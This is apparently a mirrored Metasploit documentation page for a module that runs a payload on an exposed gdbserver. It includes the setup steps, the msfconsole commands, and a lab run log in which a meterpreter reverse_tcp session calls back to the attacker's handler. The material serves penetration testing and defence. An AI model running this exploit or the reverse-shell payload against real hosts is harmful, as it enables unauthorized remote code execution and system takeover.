CoCalc -- gdb_server

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/multi/gdb/gdb_server_exec.md
²¹⁶⁶⁵ views

Vulnerable Application

This module attempts to execute an arbitrary payload on a loose gdbserver service.

Installation Steps

Install gdbserver:

apt-get install gdbserver

Verification Steps

Start gdbserver on a TCP port:

gdbserver 0.0.0.0:1234 /bin/true

Start msfconsole
Do: use exploit/multi/gdb/gdb_server_exec
Do: set RHOSTS <ip>
Do: set RPORT <port>
Do: run
You should get a session.

Options

Scenarios

gdbserver 10.2 on Ubuntu 20.04 (x86_64)

msf > use exploit/multi/gdb/gdb_server_exec
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf exploit(multi/gdb/gdb_server_exec) > set rhosts 192.168.200.135
rhosts => 192.168.200.135
msf exploit(multi/gdb/gdb_server_exec) > set rport 1234
rport => 1234
msf exploit(multi/gdb/gdb_server_exec) > set target x86_64
target => x86_64
msf exploit(multi/gdb/gdb_server_exec) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf exploit(multi/gdb/gdb_server_exec) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] 192.168.200.135:1234 - Performing handshake with gdbserver...
[*] 192.168.200.135:1234 - Stepping program to find PC...
[*] 192.168.200.135:1234 - Writing payload at 00007ffff7fd0103...
[*] 192.168.200.135:1234 - Executing the payload...
[*] Sending stage (3020772 bytes) to 192.168.200.135
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.135:33198 ) at 2022-04-16 16:21:14 -0400

meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer     : 192.168.200.135
OS           : Ubuntu 20.04 (Linux 5.13.0-35-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Vulnerable Application

Installation Steps

Verification Steps

Options

Scenarios

gdbserver 10.2 on Ubuntu 20.04 (x86_64)

Product

Resources

Company